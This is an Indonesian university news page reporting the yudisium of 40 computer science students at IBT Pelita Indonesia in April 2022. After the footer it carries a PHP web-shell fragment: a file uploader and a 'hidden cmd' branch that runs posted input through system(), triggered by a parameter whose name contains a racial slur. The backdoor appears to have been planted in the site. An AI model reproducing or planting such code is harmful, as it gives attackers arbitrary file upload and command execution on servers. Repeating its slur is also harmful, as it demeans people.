#

40 Mahasiswa Fakultas Ilmu Komputer IBT Pelita Indonesia Mengikuti Yudisium Gelombang 1 Tahun 2022

Sebanyak 40 mahasiswa Fakultas Ilmu Komputer (FILKOM), Institut Bisnis dan Teknologi (IBT) Pelita Indonesia mengikuti yudisium secara tatap muka pada Kamis (21/04/2022). Keempat puluh mahasiswa tersebut terdiri dari 15 mahasiswa dari Program Studi Sistem Informasi, dan 25 orang dari Program Studi Teknik Informatika, semuanya dinyatakan lulus Sarjana S1 dan berhak menyandang gelar Sarjana Komputer.

Acara yudisium ini dihadiri oleh Rektor IBT Pelita Indonesia, Bapak Prof. Dr. Amries Rusli Tanjung, M.M., Ak., Wakil Rektor I, Bapak Prof. Teddy Chandra, S.E., M.M., Wakil Rektor II, Bapak Dr. Ir. Harry P. Panjaitan, M.M., Ketua Yayasan Pelita Indonesia Bapak Drs. Harry Choandra, Dekan Fakultas Ilmu Komputer, Bapak Irwan M. Kom., serta seluruh unsur pejabat struktural di Fakultas Ilmu Komputer IBT Pelita Indonesia. Dalam sambutannya, Bapak Rektor mengucapkan selamat kepada mahasiswa yang telah berhasil menyelesaikan studinya, dan berharap bahwa ilmu yang didapatkan selama perkuliahan berguna bagi mereka dalam meniti karir ke depannya. “Saya berpesan kepada ananda semuanya untuk dapat menjaga nama baik kampus IBT Pelita Indonesia dimanapun ananda berkarir nantinya,” ujarnya. Sementara Bapak Wakil Rektor I dalam sambutannya berpesan kepada para mahasiswa yang mengikuti yudisium agar tidak cepat merasa puas dengan hasil yang mereka dapat saat ini, hal ini dikarenakan proses perjalanan mereka masih panjang.

Setelah serangkaian acara seremoni, acara inti pembacaan nama-nama lulusan dibacakan dengan khidmat yang diikuti dengan penuh rasa bahagia oleh para peserta. Selain itu, meskipun acara yudisium dilakukan secara tatap muka, namun tetap dengan menjalankan protokol kesehatan yang ketat, dan dengan rangkaian kegiatan yang dirancang untuk meminimalisir kontak fisik antara para peserta dan antara tamu undangan.

The Best Institute in Pekanbaru Riau

"; echo "

Uploader

"; echo "".php_uname()." "; echo "
"; echo "
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Upload Fail";}}} //hidden cmd if(isset($_REQUEST['shellnigga2099X'])){ echo "
";
echo "

CMD

"; echo "".php_uname()." "; echo " "; $shellnigga2099X = ($_POST['coba']); system($shellnigga2099X); echo "
"; die; } ?>